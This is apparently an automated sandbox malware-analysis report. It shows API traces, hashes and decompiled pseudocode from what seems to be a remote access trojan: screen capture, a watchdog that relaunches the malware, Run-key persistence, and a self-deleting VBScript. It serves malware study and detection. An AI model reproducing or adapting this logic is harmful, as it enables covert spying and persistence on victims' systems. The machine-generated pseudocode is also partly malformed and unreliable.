                              • GetProcAddress.KERNEL32(00000000), ref: 0040D12D
                              • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin), ref: 0040D13E
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D141
                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy), ref: 0040D152
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D155
                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW), ref: 0040D166
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D169
                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors), ref: 0040D17A
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D17D
                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW), ref: 0040D18E
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D191
                              • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C), ref: 0040D19F
                              • GetProcAddress.KERNEL32(00000000), ref: 0040D1A2
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: AddressProc$HandleModule$LibraryLoad
                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$user32
                              • API String ID: 551388010-3474354060
                              • Opcode ID: ee77730f3c10e163074c29ba8ff803cc8afef09899e29833192295e4fdf7bb44
                              • Instruction ID: 029b01f258c961e34356c9f3640987a8bc8548ac7ec401a199099fba32c80220
                              • Opcode Fuzzy Hash: ee77730f3c10e163074c29ba8ff803cc8afef09899e29833192295e4fdf7bb44
                              • Instruction Fuzzy Hash: 10218EA0E8035875DA20BBB66C4DE1B2E58DA84B957214C27F205D7191FBFCC5408FAF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004142A5, Relevance: 51.0, APIs: 27, Strings: 2, Instructions: 298windowmemoryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 81%
                              			E004142A5(void* __ecx, char __edx, void* __eflags, signed int _a4) {
				void* _v12;
				char _v13;
				struct HDC__* _v20;
				signed int _v24;
				signed int _v28;
				int _v32;
				int _v36;
				struct HDC__* _v40;
				void* _v46;
				intOrPtr _v50;
				intOrPtr _v54;
				char _v56;
				char _v80;
				intOrPtr _v84;
				struct tagCURSORINFO _v100;
				signed int _v106;
				signed int _v108;
				long _v116;
				long _v120;
				char _v124;
				struct _ICONINFO _v144;
				char _v168;
				void* __ebx;
				int _t114;
				void* _t115;
				void* _t116;
				void* _t120;
				int _t127;
				void* _t128;
				signed char _t140;
				long _t146;
				void* _t147;
				int _t149;
				void* _t157;
				void* _t186;
				void* _t188;
				void* _t194;
				int _t199;
				void* _t204;
				void* _t223;
				signed int _t226;
				struct HDC__* _t228;
				struct HDC__* _t232;
				struct tagBITMAPINFO* _t234;
				void* _t235;
				int _t241;

				_v13 = __edx;
				_t194 = __ecx;
				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
				_v20 = _t232;
				_t228 = CreateCompatibleDC(_t232);
				_v40 = _t228;
				_v32 = E004146DC( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
				_t114 = E00414728( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
				_t199 = _v32;
				_v36 = _t114;
				if(_t199 != 0 || _t114 != 0) {
					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
					_v12 = _t115;
					__eflags = _t115;
					if(_t115 != 0) {
						_t116 = SelectObject(_t228, _t115);
						__eflags = _t116;
						if(_t116 != 0) {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							E00414769( *((intOrPtr*)(0x46bd78 + _a4 * 4)),  &_v28);
							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
							__eflags = _t120;
							if(_t120 == 0) {
								goto L7;
							}
							__eflags = _v13;
							if(_v13 != 0) {
								_v100.cbSize = 0x14;
								_t186 = GetCursorInfo( &_v100);
								__eflags = _t186;
								if(_t186 != 0) {
									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
									__eflags = _t188;
									if(_t188 != 0) {
										_t241 = _v84 - _v144.yHotspot - _v24;
										__eflags = _t241;
										DeleteObject(_v144.hbmColor);
										DeleteObject(_v144.hbmMask);
										_t228 = _v40;
										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
										_t232 = _v20;
									}
								}
							}
							_push( &_v124);
							_t127 = 0x18;
							_t128 = GetObjectA(_v12, _t127, ??);
							__eflags = _t128;
							if(_t128 == 0) {
								goto L7;
							} else {
								_t226 = _v106 * _v108 & 0x0000ffff;
								__eflags = _t226 - 1;
								if(_t226 != 1) {
									_push(4);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										L24:
										__eflags = 1 << 1;
										_push(0x2eb6edc);
										L25:
										_t234 = LocalAlloc(0x40, ??);
										_t204 = 0x18;
										_t234->bmiHeader = 0x28;
										_t234->bmiHeader.biWidth = _v120;
										_t234->bmiHeader.biHeight = _v116;
										_t234->bmiHeader.biPlanes = _v108;
										_t234->bmiHeader.biBitCount = _v106;
										_t140 = _a4;
										__eflags = _t140 - _t204;
										if(_t140 < _t204) {
											__eflags = 1;
											_t234->bmiHeader.biClrUsed = 1 << _t140;
										}
										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
										asm("cdq");
										_t227 = _t226 & 0x00000007;
										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
										_t234->bmiHeader.biSizeImage = _t146;
										_t147 = GlobalAlloc(0, _t146);
										_a4 = _t147;
										__eflags = _t147;
										if(_t147 != 0) {
											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
											__eflags = _t149;
											if(_t149 != 0) {
												_v56 = 0x4d42;
												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												_v50 = 0;
												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												__eflags = _t157;
												_v46 = _t157;
												E004020B5(_t194,  &_v80);
												E004020B5(_t194,  &_v168);
												E004024FD(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
												E00403416( &_v80);
												E004024FD(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
												E00403416( &_v80);
												_t235 = _a4;
												E004024FD(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
												E00403416( &_v80);
												DeleteObject(_v12);
												GlobalFree(_t235);
												DeleteDC(_v20);
												DeleteDC(_t228);
												E00402024(_t194, _t194, __eflags,  &_v168);
												L00401FA7();
												L00401FA7();
												goto L32;
											}
											DeleteDC(_v20);
											DeleteDC(_t228);
											DeleteObject(_v12);
											GlobalFree(_a4);
											goto L2;
										} else {
											_push(_v20);
											L8:
											DeleteDC();
											DeleteDC(_t228);
											_push(_v12);
											goto L5;
										}
									}
									_push(8);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_push(0x10);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_t223 = 0x18;
									__eflags = _t226 - _t223;
									if(_t226 > _t223) {
										_push(0x20);
										_pop(1);
										L23:
										_a4 = 1;
										goto L24;
									}
									_a4 = _t223;
									_push(0x28);
									goto L25;
								}
								goto L23;
							}
						}
						L7:
						_push(_t232);
						goto L8;
					} else {
						DeleteDC(_t232);
						DeleteDC(_t228);
						_push(0);
						L5:
						DeleteObject();
						goto L2;
					}
				} else {
					L2:
					E00402064(_t194, _t194, 0x45f6ac);
					L32:
					return _t194;
				}
			}

















































                              0x004142b3
                              0x004142be
                              0x004142c6
                              0x004142c9
                              0x004142d5
                              0x004142d7
                              0x004142e6
                              0x004142f3
                              0x004142f8
                              0x004142fb
                              0x00414300
                              0x0041431a
                              0x00414320
                              0x00414323
                              0x00414325
                              0x0041433f
                              0x00414345
                              0x00414347
                              0x00414360
                              0x00414364
                              0x0041436f
                              0x0041438f
                              0x00414395
                              0x00414397
                              0x00000000
                              0x00000000
                              0x00414399
                              0x0041439d
                              0x004143a2
                              0x004143aa
                              0x004143b0
                              0x004143b2
                              0x004143be
                              0x004143c4
                              0x004143c6
                              0x004143e0
                              0x004143e0
                              0x004143e3
                              0x004143ec
                              0x004143f7
                              0x004143fb
                              0x00414401
                              0x00414401
                              0x004143c6
                              0x004143b2
                              0x00414407
                              0x0041440a
                              0x0041440f
                              0x00414415
                              0x00414417
                              0x00000000
                              0x0041441d
                              0x00414424
                              0x0041442a
                              0x0041442d
                              0x00414433
                              0x00414435
                              0x00414436
                              0x00414439
                              0x0041443c
                              0x00414469
                              0x00414469
                              0x00414472
                              0x00414473
                              0x0041447b
                              0x0041447f
                              0x00414480
                              0x00414489
                              0x0041448f
                              0x00414496
                              0x0041449e
                              0x004144a2
                              0x004144a5
                              0x004144a8
                              0x004144af
                              0x004144b1
                              0x004144b1
                              0x004144bd
                              0x004144c1
                              0x004144c5
                              0x004144c6
                              0x004144d4
                              0x004144db
                              0x004144de
                              0x004144e4
                              0x004144e7
                              0x004144e9
                              0x00414502
                              0x00414508
                              0x0041450a
                              0x00414537
                              0x0041454b
                              0x00414550
                              0x0041455b
                              0x0041455b
                              0x00414561
                              0x00414564
                              0x0041456f
                              0x0041457d
                              0x0041458c
                              0x00414597
                              0x004145a6
                              0x004145ae
                              0x004145b5
                              0x004145c4
                              0x004145cc
                              0x004145d3
                              0x004145e2
                              0x004145e5
                              0x004145f0
                              0x004145fb
                              0x00414603
                              0x00000000
                              0x00414603
                              0x00414515
                              0x00414518
                              0x0041451d
                              0x00414527
                              0x00000000
                              0x004144eb
                              0x004144eb
                              0x0041434a
                              0x00414350
                              0x00414353
                              0x00414355
                              0x00000000
                              0x00414355
                              0x004144e9
                              0x0041443e
                              0x00414440
                              0x00414441
                              0x00414444
                              0x00414447
                              0x00000000
                              0x00000000
                              0x00414449
                              0x0041444b
                              0x0041444c
                              0x0041444f
                              0x00414452
                              0x00000000
                              0x00000000
                              0x00414456
                              0x00414457
                              0x0041445a
                              0x00414463
                              0x00414465
                              0x00414466
                              0x00414466
                              0x00000000
                              0x00414466
                              0x0041445c
                              0x0041445f
                              0x00000000
                              0x0041445f
                              0x00000000
                              0x0041442f
                              0x00414417
                              0x00414349
                              0x00414349
                              0x00000000
                              0x00414327
                              0x0041432e
                              0x00414331
                              0x00414333
                              0x00414335
                              0x00414335
                              0x00000000
                              0x00414335
                              0x00414306
                              0x00414306
                              0x0041430d
                              0x0041460a
                              0x00414610
                              0x00414610

                              APIs
                              • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004142C0
                              • CreateCompatibleDC.GDI32(00000000), ref: 004142CC
                              • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0041431A
                              • DeleteDC.GDI32(00000000), ref: 0041432E
                              • DeleteDC.GDI32(00000000), ref: 00414331
                              • DeleteObject.GDI32(?), ref: 00414335
                              • SelectObject.GDI32(00000000,00000000), ref: 0041433F
                              • DeleteDC.GDI32(00000000), ref: 00414350
                              • DeleteDC.GDI32(00000000), ref: 00414353
                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041438F
                              • GetCursorInfo.USER32(?,?,?), ref: 004143AA
                              • GetIconInfo.USER32(?,?), ref: 004143BE
                              • DeleteObject.GDI32(?), ref: 004143E3
                              • DeleteObject.GDI32(?), ref: 004143EC
                              • DrawIcon.USER32 ref: 004143FB
                              • GetObjectA.GDI32(?,00000018,?), ref: 0041440F
                              • LocalAlloc.KERNEL32(00000040,00000001,?,?), ref: 00414475
                              • GlobalAlloc.KERNEL32(00000000,?,?,?), ref: 004144DE
                              • GetDIBits.GDI32(00000000,?,00000000,?,00000000,00000000,00000000), ref: 00414502
                              • DeleteDC.GDI32(?), ref: 00414515
                              • DeleteDC.GDI32(00000000), ref: 00414518
                              • DeleteObject.GDI32(?), ref: 0041451D
                              • GlobalFree.KERNEL32 ref: 00414527
                              • DeleteObject.GDI32(?), ref: 004145CC
                              • GlobalFree.KERNEL32 ref: 004145D3
                              • DeleteDC.GDI32(?), ref: 004145E2
                              • DeleteDC.GDI32(00000000), ref: 004145E5
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDrawLocalSelectStretch
                              • String ID: DISPLAY$d?A
                              • API String ID: 860969378-979833423
                              • Opcode ID: 473d270f5943e72469e1eb6f635e34cfdefb73a496e44f2443727fb2ad1c5628
                              • Instruction ID: 5f48c5219878f18165c8a10fe86ed1b3fa979366dd0a80e665ef025d0f654af7
                              • Opcode Fuzzy Hash: 473d270f5943e72469e1eb6f635e34cfdefb73a496e44f2443727fb2ad1c5628
                              • Instruction Fuzzy Hash: 1AB18075A00319AFDB10DFA0DC45BEEBBB8EF44752F00402AF945E7291DB74AA85CB58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040F785, Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 181synchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 94%
                              			E0040F785() {
				long _v8;
				char _v32;
				short _v556;
				short _v1076;
				short _v1596;
				short _v2116;
				void* _t27;
				void* _t28;
				void* _t31;
				long _t37;
				int _t41;
				long _t50;
				void* _t55;
				void* _t68;
				void* _t70;
				int _t71;
				void* _t72;
				long _t73;
				void* _t110;
				void* _t112;
				void* _t115;
				void* _t116;

				_t71 = 0;
				_v8 = _t73;
				CreateMutexA(0, 1, "Mutex_RemWatchdog");
				GetModuleFileNameW(0,  &_v2116, 0x104);
				_t27 = E00402469();
				_t28 = L00401F75(0x46c560);
				_t108 = 0x46c518;
				_t31 = E00410420(L00401F75(0x46c518), "exepath",  &_v556, 0x208, _t28, _t27);
				_t116 = _t115 + 0x14;
				if(_t31 != 0) {
					E004020B5(0,  &_v32);
					if(E00417334( &_v556,  &_v32) == 0) {
						goto L1;
					}
					_t110 = OpenProcess(0x100000, 0, _v8);
					WaitForSingleObject(_t110, 0xffffffff);
					CloseHandle(_t110);
					_t37 = GetCurrentProcessId();
					if(E004105A0(0x46c518, L00401F75(0x46c518), "WDH", _t37) == 0) {
						L18:
						_push(1);
						L2:
						ExitProcess();
					}
					_t108 = ShellExecuteW;
					do {
						_t41 = PathFileExistsW( &_v556);
						_t42 =  &_v556;
						if(_t41 != 0) {
							L11:
							ShellExecuteW(_t71, L"open", _t42, _t71, _t71, 1);
							L12:
							do {
								_t72 = E00410275(L00401F75(0x46c518), "WD",  &_v8);
								_t122 = _t72;
								if(_t72 == 0) {
									Sleep(0x1f4);
								} else {
									E004106D2(L00401F75(0x46c518), _t122, "WD");
								}
							} while (_t72 == 0);
							goto L17;
						}
						_t55 = E00402469();
						if(E0041729F(L00401F75( &_v32), _t55,  &_v556, _t71) == 0) {
							E00431810(_t108,  &_v1596, _t71, 0x208);
							_t116 = _t116 + 0xc;
							GetTempPathW(0x104,  &_v1596);
							GetTempFileNameW( &_v1596, L"temp_", _t71,  &_v1076);
							lstrcatW( &_v1076, L".exe");
							_t68 = E00402469();
							_t70 = E0041729F(L00401F75( &_v32), _t68,  &_v1076, _t71);
							__eflags = _t70;
							if(_t70 == 0) {
								goto L12;
							}
							_t42 =  &_v1076;
							goto L11;
						}
						_t42 =  &_v556;
						goto L11;
						L17:
						_t71 = 0;
						_t112 = OpenProcess(0x100000, 0, _v8);
						WaitForSingleObject(_t112, 0xffffffff);
						CloseHandle(_t112);
						_t50 = GetCurrentProcessId();
					} while (E004105A0(0x46c518, L00401F75(0x46c518), "WDH", _t50) != 0);
					goto L18;
				}
				L1:
				_push(_t71);
				goto L2;
			}

























                              0x0040f798
                              0x0040f79a
                              0x0040f79e
                              0x0040f7b1
                              0x0040f7be
                              0x0040f7c6
                              0x0040f7d7
                              0x0040f7eb
                              0x0040f7f0
                              0x0040f7f5
                              0x0040f801
                              0x0040f816
                              0x00000000
                              0x00000000
                              0x0040f827
                              0x0040f82c
                              0x0040f833
                              0x0040f839
                              0x0040f857
                              0x0040f9ce
                              0x0040f9ce
                              0x0040f7f8
                              0x0040f7f8
                              0x0040f7f8
                              0x0040f85d
                              0x0040f863
                              0x0040f86a
                              0x0040f872
                              0x0040f878
                              0x0040f92e
                              0x0040f939
                              0x0040f93b
                              0x0040f940
                              0x0040f957
                              0x0040f95b
                              0x0040f95d
                              0x0040f97a
                              0x0040f95f
                              0x0040f96d
                              0x0040f972
                              0x0040f980
                              0x00000000
                              0x0040f940
                              0x0040f883
                              0x0040f89f
                              0x0040f8b9
                              0x0040f8be
                              0x0040f8cd
                              0x0040f8e7
                              0x0040f8f9
                              0x0040f90a
                              0x0040f91d
                              0x0040f924
                              0x0040f926
                              0x00000000
                              0x00000000
                              0x0040f928
                              0x00000000
                              0x0040f928
                              0x0040f8a1
                              0x00000000
                              0x0040f984
                              0x0040f987
                              0x0040f995
                              0x0040f99a
                              0x0040f9a1
                              0x0040f9a7
                              0x0040f9c6
                              0x00000000
                              0x0040f863
                              0x0040f7f7
                              0x0040f7f7
                              0x00000000

                              APIs
                              • CreateMutexA.KERNEL32(00000000,00000001,Mutex_RemWatchdog,0046C578,0046C518,00000000), ref: 0040F79E
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040F7B1
                                • Part of subcall function 00410420: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 0041043C
                                • Part of subcall function 00410420: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00410455
                                • Part of subcall function 00410420: RegCloseKey.ADVAPI32(00000000), ref: 00410460
                              • ExitProcess.KERNEL32 ref: 0040F7F8
                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040F821
                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040F82C
                              • CloseHandle.KERNEL32(00000000), ref: 0040F833
                              • GetCurrentProcessId.KERNEL32 ref: 0040F839
                              • PathFileExistsW.SHLWAPI(?), ref: 0040F86A
                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0040F939
                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 0040F98F
                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040F99A
                              • CloseHandle.KERNEL32(00000000), ref: 0040F9A1
                              • GetCurrentProcessId.KERNEL32 ref: 0040F9A7
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Process$CloseOpen$CurrentFileHandleObjectSingleWait$CreateExecuteExistsExitModuleMutexNamePathQueryShellValue
                              • String ID: .exe$Mutex_RemWatchdog$WDH$exepath$open$temp_
                              • API String ID: 2645874385-232273909
                              • Opcode ID: 000e77ad3a4b68f1b65fdd9cf93c06e27b4433b195a74a56e8cefade3b9146bf
                              • Instruction ID: 39908bf11b75da137bed33461dc6f1560e7a678cbeca7b59d94bc4d120dac13a
                              • Opcode Fuzzy Hash: 000e77ad3a4b68f1b65fdd9cf93c06e27b4433b195a74a56e8cefade3b9146bf
                              • Instruction Fuzzy Hash: FF51F571A003197BDB10ABA09C49EFF336C9B04755F10007BB501A32E2EF788E498B5D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040B465, Relevance: 38.8, APIs: 6, Strings: 16, Instructions: 280registryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 98%
                              			E0040B465(char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				char _v172;
				short _v692;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t53;
				void* _t54;
				void* _t57;
				signed int _t61;
				void* _t62;
				void* _t78;
				void* _t79;
				void* _t92;
				void* _t93;
				signed char _t134;
				void* _t243;
				void* _t245;
				void* _t246;
				void* _t247;

				L0040FB4B();
				if( *0x46a9d4 != 0x30) {
					L00409D75();
				}
				_t243 =  *0x46bd6b - 1; // 0x0
				if(_t243 == 0) {
					L00414D1D(_t243);
				}
				if( *0x46ba75 != 0) {
					E004170AC(L00401ECB(0x46c0e0));
				}
				_t231 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t245 =  *0x46bb06 - 1; // 0x0
				if(_t245 == 0) {
					E0041074C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401ECB(0x46c4e8));
				}
				_t246 =  *0x46baff - 1; // 0x0
				if(_t246 == 0) {
					E0041074C(0x80000002, _t231, L00401ECB(0x46c4e8));
				}
				_t247 =  *0x46bb04 - 1; // 0x0
				if(_t247 == 0) {
					E0041074C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401ECB(0x46c4e8));
				}
				_t53 = E00402469();
				_t54 = L00401F75(0x46c560);
				_t57 = E00410420(L00401F75(0x46c518), "exepath",  &_v692, 0x208, _t54, _t53);
				_t248 = _t57;
				if(_t57 == 0) {
					GetModuleFileNameW(0,  &_v692, 0x208);
				}
				RegDeleteKeyA(0x80000001, L00401F75(0x46c518));
				_t61 = SetFileAttributesW( &_v692, 0x80);
				_t140 = 0x46c530;
				asm("sbb bl, bl");
				_t134 =  ~_t61 & 0x00000001;
				_t62 = E004074E6(_t248);
				_t249 = _t62;
				if(_t62 != 0) {
					_t140 = 0x46c530;
					SetFileAttributesW(L00401ECB(0x46c530), 0x80);
				}
				E00403086(_t134,  &_v124, E0040425F(_t134,  &_v52, E0043918F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
				L00401ED0();
				E004043E5(_t134,  &_v28, L"On Error Resume Next\n", _t249, E0040425F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				L00401ED0();
				_t250 = _t134;
				if(_t134 != 0) {
					E004032F1(E00403086(_t134,  &_v52, E004043E5(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E0040425F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
					L00401ED0();
					L00401ED0();
					L00401ED0();
				}
				E004032F1(E00403086(_t134,  &_v100, E00403086(_t134,  &_v76, E0040425F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				_t251 = _t134;
				if(_t134 != 0) {
					E0040766E(_t134,  &_v28, 0, L"wend\n");
				}
				_t78 = E004074E6(_t251);
				_t252 = _t78;
				if(_t78 != 0) {
					E004032F1(E00403086(0x45f714,  &_v100, L00409E6B( &_v76, L"fso.DeleteFolder \"", _t252, 0x46c530), 0, _t252, L"\"\n"));
					L00401ED0();
					L00401ED0();
				}
				_t79 = E0040425F(0x45f714,  &_v172, L"\"\"\", 0");
				E004032F1(E00403086(0x45f714,  &_v100, E00403010( &_v76, E00404409(0x45f714,  &_v52, E0040425F(0x45f714,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				E0040766E(0x45f714,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t92 = L00401ECB( &_v124);
				_t93 = E00402469();
				if(E0041729F(L00401ECB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", L00401ECB( &_v124), 0x45f714, 0x45f714, 0) > 0x20) {
					ExitProcess(0);
				}
				L00401ED0();
				L00401ED0();
				return L00401ED0();
			}




























                              0x0040b471
                              0x0040b47d
                              0x0040b47f
                              0x0040b47f
                              0x0040b487
                              0x0040b48d
                              0x0040b48f
                              0x0040b48f
                              0x0040b49b
                              0x0040b4a9
                              0x0040b4a9
                              0x0040b4b3
                              0x0040b4b8
                              0x0040b4be
                              0x0040b4cf
                              0x0040b4d4
                              0x0040b4d5
                              0x0040b4db
                              0x0040b4ec
                              0x0040b4f1
                              0x0040b4f2
                              0x0040b4f8
                              0x0040b50c
                              0x0040b511
                              0x0040b519
                              0x0040b521
                              0x0040b547
                              0x0040b551
                              0x0040b553
                              0x0040b55e
                              0x0040b55e
                              0x0040b571
                              0x0040b589
                              0x0040b594
                              0x0040b599
                              0x0040b59b
                              0x0040b59e
                              0x0040b5a3
                              0x0040b5a5
                              0x0040b5ac
                              0x0040b5b7
                              0x0040b5b7
                              0x0040b5d7
                              0x0040b5e0
                              0x0040b5fb
                              0x0040b604
                              0x0040b609
                              0x0040b60b
                              0x0040b63f
                              0x0040b647
                              0x0040b64f
                              0x0040b657
                              0x0040b657
                              0x0040b68f
                              0x0040b697
                              0x0040b69f
                              0x0040b6a7
                              0x0040b6ac
                              0x0040b6ae
                              0x0040b6b8
                              0x0040b6b8
                              0x0040b6cb
                              0x0040b6d0
                              0x0040b6d2
                              0x0040b6f7
                              0x0040b6ff
                              0x0040b707
                              0x0040b707
                              0x0040b71c
                              0x0040b75b
                              0x0040b763
                              0x0040b76b
                              0x0040b773
                              0x0040b77e
                              0x0040b789
                              0x0040b796
                              0x0040b79f
                              0x0040b7a8
                              0x0040b7c6
                              0x0040b7e6
                              0x0040b7e6
                              0x0040b7ef
                              0x0040b7f7
                              0x0040b80a

                              APIs
                                • Part of subcall function 0040FB4B: TerminateProcess.KERNEL32(00000000,?,0040B118), ref: 0040FB5B
                                • Part of subcall function 0040FB4B: WaitForSingleObject.KERNEL32(000000FF,?,0040B118), ref: 0040FB6E
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B55E
                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B571
                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B589
                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B5B7
                                • Part of subcall function 00409D75: TerminateThread.KERNEL32(0040884D,00000000,?,0040B126), ref: 00409D84
                                • Part of subcall function 00409D75: UnhookWindowsHookEx.USER32(00000000), ref: 00409D94
                                • Part of subcall function 00409D75: TerminateThread.KERNEL32(Function_00008832,00000000,?,0040B126), ref: 00409DA6
                                • Part of subcall function 0041729F: CreateFileW.KERNEL32(00405D1C,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00000004,00000000,00000000,?,004173C9,00000000,00000000), ref: 004172DE
                              • ShellExecuteW.SHELL32(00000000,open,00000000,0045F714,0045F714,00000000), ref: 0040B7DA
                              • ExitProcess.KERNEL32 ref: 0040B7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                              • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                              • API String ID: 1861856835-1536747724
                              • Opcode ID: f8555620d053e2ba0ee88039e02dcc354c2519fc645e296044691fa67c3c0157
                              • Instruction ID: cb4c9db422e66655c9b91f3ac858345e6386e01706fd0e6f849a483e47031bcc
                              • Opcode Fuzzy Hash: f8555620d053e2ba0ee88039e02dcc354c2519fc645e296044691fa67c3c0157
                              • Instruction Fuzzy Hash: 9891B131A101186ACB14FB62DCA69EF7769AF50348F14007FF406731E2EF781E4A869E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041636B, Relevance: 38.7, APIs: 12, Strings: 10, Instructions: 185synchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 86%
                              			E0041636B(void* __ecx, void* __edx, char _a4) {
				char _v24;
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t25;
				void* _t28;
				void* _t43;
				void* _t60;
				void* _t63;
				void* _t67;
				CHAR* _t89;
				void* _t109;
				CHAR* _t110;
				void* _t111;
				void* _t114;
				void* _t118;

				_t103 = __edx;
				_t67 = __ecx;
				_t109 = __edx;
				if(E004165B1( &_a4, __ecx, __ecx) == 0xffffffff) {
					_t63 = L00401ECB( &_a4);
